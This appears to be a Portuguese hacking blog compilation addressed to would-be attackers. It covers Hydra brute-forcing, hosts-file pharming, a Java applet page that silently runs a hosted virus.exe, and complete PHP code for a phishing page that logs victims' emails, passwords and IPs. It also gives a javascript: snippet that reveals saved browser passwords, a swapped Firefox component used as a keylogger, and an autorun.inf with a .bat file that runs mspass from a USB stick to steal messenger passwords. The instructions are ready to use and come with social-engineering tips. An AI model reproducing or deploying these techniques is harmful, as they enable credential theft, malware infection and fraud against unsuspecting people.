Ataque brute force com o Hydra
Ataques Brute Force
Sobre os Ataques brute force : o atacante tenta adivinhar a senha por tentativa e erro testando várias combinações de usuários e senhas (disponíveis em listas que podem ser encontradas na Internet ou baseando suas tentativas em dados que conseguiu utilizando engenharia social ou por conhecer a vítima do ataque) para tentar logar em um determinado serviço no qual ele não tem autorização, obtendo um shell em um servidor por exemplo.
Efetuar este tipo de ataque é bem demorado e pode ser facilmente impedido por administradores que utilizem técnicas como limitar o número de tentativas erradas utilizando um determinado nome de usuário. Porém, existem várias ferramentas que fazem com que estes ataques sejam efetuados de modo mais eficiente, uma delas é o THC Hydra.
THC Hydra
O Hydra tem um desempenho muito bom (utiliza threads paralelas, dividindo as senhas e nomes de usuários entre estas threads diminuindo o tempo levado para ele conseguir adivinhar a senha) e consegue efetuar com sucesso ataques brute force nos protocolos TELNET</SPAN>, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, LDAP2, Cisco AAA. Além disso, está em constante desenvolvimento e é completamente gratuito com o código-fonte 100% disponível. Ele ainda possui uma interface gráfica, o HydraGTK. Ela é completamente independente do software e não precisa ser compilada para que você consiga utilizá-lo. Porém, sem ela você só poderá utilizá-lo através da linha de comando.Você pode utilizar o Hydra em qualquer Unix como Linux, *BSD, Solaris, etc; Mac Os/X; no Windows utilizando o Cygwin; em dispositivos móveis que utilizem processadores ARM e Linux e em dispositivos que utilizem o PalmOS.
Pharming (Windows)
A técnica de Pharming no Windows se baseia em trocar os DNS’s de um arquivo, fazendo assim, você acessar um site sem a intenção de fazer aquilo.
O arquivo é o C:\Windows\System32\drivers\etc e possui uma lista de DNS’s com endereços de IP.
O que ele faz?
Ele simplesmente faz o seguinte:
- Quando você digita 127.0.0.1, ele abre o endereço localhost automaticamente… E na barra de endereços, o endereço fica 127.0.0.1.
Pera ae… Isso quer dizer que eu posso fazer a vítima acessar um site, o site aparecer corretamente na barra de endereços e a vítima estar acessando outro site? CORRETO!
Abrindo o arquivo com o bloco de notas, podemos ver:
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a ‘#’ symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost127.0.0.1 localhost
Agora, vamos pegar por exemplo, o IP de Google.com e o DNS de Orkut.com e adicionar no arquivo (assim, quando a você tentar acessar o Orkut, você vai cair no Google).
Dando um ping www.google.com, temos:
Disparando www.l.google.com [64.233.163.104] com 32 bytes de dados:
Resposta de 64.233.163.104: bytes=32 tempo=50ms TTL=56
Resposta de 64.233.163.104: bytes=32 tempo=45ms TTL=56
Resposta de 64.233.163.104: bytes=32 tempo=46ms TTL=56
Resposta de 64.233.163.104: bytes=32 tempo=49ms TTL=56
Agora, pegamos o IP do Google.com (64.233.163.104) e acrescentamos, junto ao DNS do Orkut.com, no arquivo hosts.
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a ‘#’ symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost127.0.0.1 localhost
64.233.163.104 www.orkut.com
Pronto! Agora, quando você for acessar Orkut.com, vai abrir a página do Google.com (na barra de endereços, continuará Orkut.com).
Assim, se você fizer isso com uma página fake, a vítima verá a barra de endereçõs idêntica, mas estará logando em outro site! Isso foi apenas para explicar como funciona o Pharming (Windows) com um pouco de imaginação e SEing, ai ai…
Auto infect por URL (HTML Auto Infect)
Um HTML auto-infect é uma página da web que executa códigos ou softwares maliciosos sem o conhecimento da vitima.
Segue abaixo em anexo os arquivos necessários e o tutorial para configuração:
- 1- Faça upload do .exe desejado em um host e pegue o link. Ex: www.virus.com/virus.exe
- 2 – Agora, edite o HTML de auto-infect:
<applet name=”link” code=”Inicio.class” archive=”link.jar” height=”10″ width=”1″>
<param name=”url” value=”virus.exe”>
Troque isso para:
<applet name=”link” code=”Inicio.class” archive=”link.jar” height=”10″ width=”1″>
<param name=”url” value=”www.virus.com/virus.exe“>
PS: www.virus.com/virus.exe é apenas um exemplo! Nesse passo, você deve substituir pelo link obtido ao fazer o upload do .exe no seu host!
- 3- Hospede também, no mesmo host, o arquivo .html, o arquivo LOGGER e o arquivo .jar (ambos no mesmo diretório).
- 4- Pronto! Ao acessar o .html, ele vai rodar o virus.exe!
PS: Se a vítima não tiver o Java Runtimes instalado no computador, o navegador irá mostrar a opção para instalar. Se isso acontecer, é so você enrolar a vítima com uma engenharia social (falando que é um jogo em java e precisa de complemento, por exemplo).
- Pagina do auto infect neste link:
Password: www.darkers.com.br
Criando uma página fake!
Esse tutorial vai te ensinar a criar uma página fake de qualquer site!
Para aqueles que não sabem o que é uma página fake…
- Página fake é uma página falsa de login de um site, que rouba os dados das pessoas. Como por exemplo uma página fake de login de um banco (que possui a fução de roubar a senha dos usuários do banco).
Nossa pagina fake funciona da seguinte maneira:
1º – Você vai precisar de um arquivo HTML (o login.html) e mais alguns arquivos PHP
- salva.php
- apagar.php
- ler.php
Você vai upar todos os arquivos em um host free [www.110mb.com] e quando a vítima logar na página fake, os seus dados serão salvos em um arquivo “senhas.txt” no próprio host!
Para ver esse arquivo, acesse o arquivo ler.php. E para apagar, acesse o arquivo apagar.php!
Vamos lá! Primeiramente, entre na página de login de algum site (vamos pegar o Orkut como exemplo) e salve o html como login.html!
Agora, entre no bloco de notas e crie os PHP’s: - salva.php:
<?php
$nomearquivo =”senhas.txt”;
$email =$_POST["VALOR DO INPUT DE LOGIN"];
$senha =$_POST["VALOR DO INPUT DE SENHA"];
$browser =$_SERVER['HTTP_USER_AGENT'];
$ip =$_SERVER['REMOTE_ADDR'];
$hostname =gethostbyaddr($ip);
$data =date(“Y-m-d”);
$hora =date(“H:i:s”);
$traco =”<br><br>”;
$ess =”Email: “.$email.”<br>Senha: “.$senha.”<br>Navegador: “.$browser.”<br>IP: “.$ip.”<br>Nome do Host: “.$hostname.”<br>Data: “.$data.”<br>Hora: “.$hora.”<br>”.$traco;
$abre =@fopen(“senhas.txt”,”a “);
$escreve =fwrite($abre, $ess);
echo “<script>javascript:document.location=’SITE DESEJADO’</script>”;
?>
- apagar.php:
<?php
$fd = @fopen(“senhas.txt”,”w”) or die(“arquivo inexistente”);
fpassthru($fd);
?>
- ler.php:
<?php
$fd = @fopen(“senhas.txt”,”r”) or die(“Falta um arquivo no servidor!!”);
fpassthru($fd);
?>
Agora, abra login.html com um editor de HTML, ou com o próprio bloco de notas, e ache o form de login. Esse form é um código que, geralmente, vem nos botões de “Entrar” ou “Login”, que dá um endereço pra página ser redirecionada após o login (se o login for autenticado, ou seja, se o usuário e a senha estiverem certos). Geralmente, ele está escrito no seguinte código:
<form name=”loginForm” action=”…”
- O endereço do Action muda de acordo com o site. Quando for assim, adicione um “Salva.php” no action!
<form name=”loginForm” action=”salva.php”
Dica: O form quase sempre vem seguido do “Action”, que significa uma ação que irá acontecer quando clicar no botão (ou quando a página for atualizada). Então, para achar o form de login, aperta Ctrl F e procura por “Action” no código fonte. Quando você ver que achou o form de login, você substitui o endereço do Action por salva.php. Em geral, é assim, mas em alguns casos, em vez de action, tem outros códigos (um deles é OnClick), mas fica fácil de achar, é so pesquisar bastante no código fonte.
- No caso do Orkut, no código-fonte, o form está assim:
<form id=”gaia_loginform” action=”https://www.google.com/accounts/ServiceLoginAuth?service=orkut“
-É só você trocar por:
<form id=”gaia_loginform” action=”salva.php”
-Agora você procura, por perto do form, a parte do INPUT. Procura o INPUT de usuário e o INPUT de senha. O INPUT é o campo onde você digita a senha. Dica: a maioria dos inputs estao com type=HIDDEN (escondidos). Então, o INPUT que você vai procurar é o de inserir senha e login. Geralmente eles tem nome de LOGIN e PASSWORD. No código-fonte da página de login do Orkut é assim:
<input name=”Email”
e
<input name=”passwd”
Agora você pega os valores dos “input name”, que no exemplo, é “username” e “password”, abre o salva.php. Ele deve estar assim:
<?php
$nomearquivo =”senhas.txt”;
$email =$_POST["VALOR DO INPUT DE LOGIN"];
$senha =$_POST["VALOR DO INPUT DE SENHA"];
$browser =$_SERVER['HTTP_USER_AGENT'];
$ip =$_SERVER['REMOTE_ADDR'];
$hostname =gethostbyaddr($ip);
$data =date(“Y-m-d”);
$hora =date(“H:i:s”);
$traco =”<br><br>”;
$ess =”Email: “.$email.”<br>Senha: “.$senha.”<br>Navegador: “.$browser.”<br>IP: “.$ip.”<br>Nome do Host: “.$hostname.”<br>Data: “.$data.”<br>Hora: “.$hora.”<br>”.$traco;
$abre =@fopen(“senhas.txt”,”a “);
$escreve =fwrite($abre, $ess);
echo “<script>javascript:document.location=’SITE DESEJADO’</script>”;
?>
Agora, você coloca na 2º e na 3º linha, entre aspas, os valores e na penúltima linha, coloque endereço do login Vai ficar assim:
<?php
$nomearquivo =”senhas.txt”;
$email =$_POST["Email"];
$senha =$_POST["passwd"];
$browser =$_SERVER['HTTP_USER_AGENT'];
$ip =$_SERVER['REMOTE_ADDR'];
$hostname =gethostbyaddr($ip);
$data =date(“Y-m-d”);
$hora =date(“H:i:s”);
$traco =”<br><br>”;
$ess =”Email: “.$email.”<br>Senha: “.$senha.”<br>Navegador: “.$browser.”<br>IP: “.$ip.”<br>Nome do Host: “.$hostname.”<br>Data: “.$data.”<br>Hora: “.$hora.”<br>”.$traco;
$abre =@fopen(“senhas.txt”,”a “);
$escreve =fwrite($abre, $ess);
echo “<script>javascript:document.location=’http://www.orkut.com‘</script>”;
?>
Salve e pronto!
Agora você precisa saber a função de cada arquivo:
-> login.htm: a página fake já com as modificações necessárias
-> login_arquivos: imagens (geralmente, gifs e pngs) da página de login
-> salva.php: arquivo php necessário pra página funcionar (salva senhas e logins no arquivo senhas.txt)
-> ler.php: com esse arquivo é que você vai conseguir ver as senhas e logins (permite você visualizar o arquivo senhas.txt)
-> apagar.php: com esse arquivo, você vai apagar as senhas e logins depois de ter guardado (apaga o arquivo senhas.txt)
-> senhas.txt: o arquivo com as senhas que vâo ser salvas depois de alguem ter logado na página fake. Se você quiser dificultar o acesso de outras pessoas à sua página fake, mude “senhas.txt” e “ler.php”, como por exemplo hell.php e hell.txt. Fica mais difícil de uma pessoa descobrir o link do log de senhas. Mas, para fazer isso, você vai ter que mudar o nome em todos os lugares, em todos phps e na página fake, que fazem referência à Salvar.txt e Ler.php.
IMPORTANTE: Coloque todos os 4 arquivos juntos no mesmo diretório
IMPORTANTE²: Crie uma pasta no diretorio onde vc fez o upload dos 4 arquivos e faça o upload dos arquivos que estao dentro da pasta login_Arquivos
Recuperando senhas gravadas no navegador
Existem softwares para recuperação de senhas gravadas em inputs do tipo password, neste caso não vamos utilizar nenhum programa externo, apenas javascript e umnavegador (testado apenas no FF).
O primeiro passo é acessar o site e fazer com que a senha seja carregada no campo de password, em alguns casos é necessário digitar o usuário para que isto aconteça.
Feito isso, carregue o jQuery no site através do campo da url:
javascript:var%20script=document.createElement(“script”);script.type=”text/javascript”;
script.src=”http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js“;
document.getElementsByTagName(“head”)[0].appendChild(script);void(0);
Sabendo que agora você pode usar os recursos do jQuery, você precisa encontrar o input do tipo password e exibir o atributo “value” dele, o código que faz isso:
javascript:alert($(“input[type=password]“).val())
Simples assim, este comando deve abrir um alert com a sua senha.
Transformando o Firefox em um keylogger
Vamos ver como trnasformar o Firefox em um keylogger muito útil.
Técnica descoberta por RAJ.
A tecnica consiste forçar o uso o proprio armazenamento de senhas do Firefox, muito simples!
Não é necessário nenhum programa, apenas substituir o javascript original por um modificado, a modificação faz um bypass que força o armazenamento da identidade.
E o melhor, é cross platform… funciona em todos sistemas operacionais!
Como?
1 – Feche o firefox.
2 – No Windows, vá em: C:/Arquivos de programas/Mozilla Firefox/Components
Linux, por exemplo em: /usr/lib/firefox-3.6.3/components/
Mac: Applications > botão direito no Firefox > Show Package Contents > Contents/MacOS/Components.
3 – Iremos substituir o script chamado “nsLoginManagerPrompter.js” pelo bypassed, baixe a modificação aqui, talvez vc queira copiar o original antes de substituir pelo modificado.
Uma vez substituido, está pronto!
Agora o Firefox irá armazenar automaticamente todas informações de login!
Para ver esses dados abra o Firefox, Editar, Preferencias / aba Segurança e clique em “senhas salvas”…. pronto, está tudo ai!
Espero que seja útil a vocês, Abraços
Reeves
Roubando senhas de MSN/Yahoo/Gtalk (orkut) com pen drive!
Roubando senhas de MSN/Yahoo/Gtalk (orkut) com pen drive!
É bastante simples, primeiramente baixe o mspass. Para aqueles que gostam de baixar direto da fonte, baixe aqui:http://www.nirsoft.net/utils/mspass.html
Abre o pendrive e crie um documento chamado “autorun.inf”.
Nele escreva isso:
[autorun]
open=captura.bat
ACTION=darkers
Renomeie o disco do seu pendrive para o mesmo nome que esta na propriedade ‘Action.”
Ex: Se estiver com o nome “Disco Removível” e no Action tiver “darkers”, clique com o botão direito sobre o ícone do pendrive e clique em Renomear e ponha “darkers” no nome.
Então crie uma pasta chamada mspass, nessa pasta você copia o mspass.exe que você baixou. *Não a instalação e sim o .exe do programa! (Isso somente para quem optou por baixar a instalação dele na fonte logo acima.)
Então você cria um arquivo .bat, que é chamado captura.bat. Nesse arquivo você escreve:
start mspass\mspass.exe /stext Senhas.txt
OK! Isso é tudo que você tem que fazer. Você colocar o o seu pendrive em qualquer computador, o autostart.inf executará o mspass. Depois de alguns segundos, você pode remover o pendrive. Depois disso, aparecerá um arquivo chamado Senhas.txt no seu pendrive, com as senhas que o Mspass pegou!
- -O Mspass é um programa que decodifica senhas de MSN (e de alguns outros softwares também, como Yahoo Messenger), descobrindo a senha de usuários que ja logaram no computador que ele for executado.
- -O arquivo captura.bat serve para salvar todo texto do mspass em um arquivo .txt, ou seja, ele vai salvar o login e senha no .txt.
- -O Mspass caputura senhas de: MSN Messenger | Windows Messenger (In Windows XP) | Windows Live Messenger (In Windows XP/Vista/7) | Yahoo Messenger (Versions 5.x and 6.x) | Google Talk | ICQ Lite 4.x/5.x/2003 | AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro. | Trillian | Trillian Astra | Miranda | GAIM/Pidgin | MySpace IM | PaltalkScene | Digsby
.is Alive!
Yes, estamos vivos!
Muito tempo parado mas estamos voltando a ativa com o darkers. Muitas idéias estão surgindo e muito vontade de compartilhar tudo que aprendemos em nossa casa.
Bom, este post é apenas para dizer que estamos VIVOS e logo mais estaremos postando matérias e algo mais produtivo.